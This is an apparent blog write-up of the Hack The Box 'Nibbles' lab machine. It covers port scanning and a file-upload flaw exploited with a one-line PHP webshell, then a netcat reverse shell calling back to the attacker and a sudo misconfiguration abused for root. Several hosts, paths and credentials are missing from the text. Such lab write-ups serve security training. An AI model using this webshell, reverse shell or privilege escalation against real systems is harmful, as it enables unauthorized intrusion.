HTB: Nibbles


This machine is Nibble from Hack The Box


A service discovery scan to start

root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-07-13 06:16 EDT
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

Checking port 80

Screenshot 1

In the source

Screenshot 2

Off to

Screenshot 3

Fired up dirbuster

Screenshot 4

Screenshot 5

And off to admin.php

Screenshot 6

I tested a few potential creds and got lucky with


Screenshot 7

Some googling revealed an arbitrary file upload bug, so I made a quick php shell called shell.php

<?php system($_GET['cmd']); ?>

Went to went to

Screenshot 8

And uploaded my shell, it came up with some warnings

Screenshot 9

I found it would be uploaded to, so I tested it with

Screenshot 10

And setup for a reverse shell

root@kali:~# nc -nlvp 1234

But none of my reverse shells worked, so I took a php reverse shell file from /usr/share/webshells/, pointed it at me and renamed it .txt before copying it into /var/www/html

root@kali:~# apache2ctl start

Then used my webshell to set it up php-reverse-shell.txt php-reverse-shell.php

Before triggering it by going to
connect to [] from (UNKNOWN) [] 54926
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:43:48 up 34 min,  0 users,  load average: 0.30, 0.09, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off

There we go, upgrade the shell

$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found


$ python3 -c "import pty;pty.spawn('/bin/bash')"


nibbler@Nibbles:/$ cd ~
nibbler@Nibbles:/home/nibbler$ ls -la
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt

nibbler@Nibbles:/home/nibbler$ cat user.txt

Root Time

I looked for a priv esc route

nibbler@Nibbles:/home/nibbler$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/

Now I know that directory doesn't exist, but the directory it is meant to be in is writable, so I can add it, make the script, then run it as root

nibbler@Nibbles:/home/nibbler$ mkdir personal
nibbler@Nibbles:/home/nibbler$ cd personal
nibbler@Nibbles:/home/nibbler/personal$ mkdir stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "/bin/sh" >
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/

There's the shell

# id
uid=0(root) gid=0(root) groups=0(root)

# cd /root
# ls -la
drwx------  4 root root 4096 Dec 29  2017 .
drwxr-xr-x 23 root root 4096 Dec 28  2017 ..
-rw-------  1 root root    0 Dec 29  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Dec 10  2017 .cache
drwxr-xr-x  2 root root 4096 Dec 10  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Dec 10  2017 root.txt

# cat root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.